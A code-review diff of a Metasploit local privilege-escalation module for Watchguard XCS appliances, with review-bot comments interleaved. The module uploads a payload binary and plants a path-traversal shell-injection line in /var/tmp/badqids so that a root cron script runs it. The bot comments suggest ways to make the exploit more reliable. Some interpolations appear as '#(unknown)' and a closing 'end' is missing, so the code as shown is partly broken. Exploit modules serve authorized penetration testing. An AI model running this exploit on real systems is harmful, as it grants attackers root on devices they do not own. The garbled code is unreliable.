diff --git a/modules/exploits/freebsd/misc/watchguard_local_privesc.rb b/modules/exploits/freebsd/misc/watchguard_local_privesc.rb
index b8d37f80dc..e7e2edd748 100644
--- a/modules/exploits/freebsd/misc/watchguard_local_privesc.rb
+++ b/modules/exploits/freebsd/misc/watchguard_local_privesc.rb
@@ -7,7 +7,10 @@ require 'msf/core'
 class Metasploit4 < Msf::Exploit::Local
- Rank = ExcellentRanking
+ # It needs 3 minutes wait time
+ # WfsDelay set to 180, so it should be a Manual exploit,
+ # to avoid it being included in automations
+ Rank = ManualRanking
 include Msf::Exploit::EXE
 include Msf::Post::File
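Review bot: The new comment above `Rank` reads awkwardly ("It needs 3 minutes wait time") and gives the consequence before the cause, so a reader still has to dig into `exploit` to learn why the wait exists. Something like `# The root shell is delivered by a cron-driven script, so a session can take up to 3 minutes to arrive (WfsDelay => 180); ManualRanking keeps the module out of automated runs.` states the reason once, next to the ranking it justifies. The class body continues outside this hunk.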
@@ -27,68 +30,73 @@ class Metasploit4 < Msf::Exploit::Local
 'License' => MSF_LICENSE, 'References' => [
- ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
+ ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
 ], 'Platform' => 'bsd', 'Arch' => ARCH_X86_64,
- 'SessionTypes' => [ 'shell' ],
- 'Privileged' => false,
+ 'SessionTypes' => ['shell'],
+ 'Privileged' => true,
 'Targets' => [ [ 'Watchguard XCS 9.2/10.0', { }] ],
+ 'DefaultOptions' => { 'WfsDelay' => 180 },
 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 29 2015' ))
 end
+ def setup
+ @pl = generate_payload_exe
+ if @pl.nil?
+ fail_with(Failure::BadConfig, 'Please select a native bsd payload')
+ end
+
+ super
+ end
+
 def check
 #Basic check to see if the device is a Watchguard XCS
 res = cmd_exec('uname -a')
- return Exploit::CheckCode::Appears if res =~ /support-xcs@watchguard.com/
+ return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
 Exploit::CheckCode::Safe
 end
 def upload_payload
- #Generates and uploads the payload to the device
 fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
- @pl = generate_payload_exe
+ write_file(fname, @pl)
- return nil if not file_exist?(fname)
+ return nil unless file_exist?(fname)
 cmd_exec("chmod +x #{fname}")
- return fname
+
+ fname
 end
 def exploit
- print_status("Rooting can take up to 3 minutes.")
+ print_warning('Rooting can take up to 3 minutes.')
 #Generate and upload the payload
 filename = upload_payload
- fail_with(Failure::NotFound, "Payload failed to upload") if filename.nil?
+ fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
 print_status("Payload #(unknown) uploaded.")
 #Sets up empty dummy file needed for privesc
 dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
 cmd_exec("touch #{dummy_filename}")
- vprint_status("Added dummy file")
+ vprint_status('Added dummy file')
 #Put the shell injection line into badqids #setup_privesc = "echo \"../../../../../..#{dummy_filename};#(unknown)\" > /var/tmp/badqids"
- badqids = write_file("/var/tmp/badqids","../../../../../..#{dummy_filename};#(unknown)")
- fail_with(Failure::NotFound, "Failed to create badqids file to exploit crontab") if badqids.nil?
- print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
+ badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#(unknown)")
+ fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
+ print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
 #cmd_exec(setup_privesc) #Cleanup the files we used
- register_file_for_cleanup("/var/tmp/badqids")
+ register_file_for_cleanup('/var/tmp/badqids')
 register_file_for_cleanup(dummy_filename)
 register_file_for_cleanup(filename)
-
- #Wait for crontab to run vulnerable script
- select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
- print_status("Ran out of time, should have root shell by now.")
- end
 end
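Review bot: The `if badqids.nil?` guard after the new `write_file('/var/tmp/badqids', ...)` line does not establish that the injection file actually landed: the return value of `write_file` over a shell session is not a write-success indicator as far as I can tell, so a failed write — for instance a pre-existing `/var/tmp/badqids` owned by another user in that shared, world-writable directory — would still print "Badqids created" and the module would then idle for the full WfsDelay with no root shell. `upload_payload` in the same hunk already verifies its write with `file_exist?`, and the same check belongs here: `fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') unless file_exist?('/var/tmp/badqids')`. Since the cron-run script will execute whatever path follows the `;` as root, the `#(unknown)` tokens in the `badqids` lines presumably stand for the `#{filename}` interpolation and should be confirmed against the actual file before merge. Note the hunk as rendered also drops the closing `end` of `exploit` without a replacement, which looks like a capture artefact but is worth a parse check.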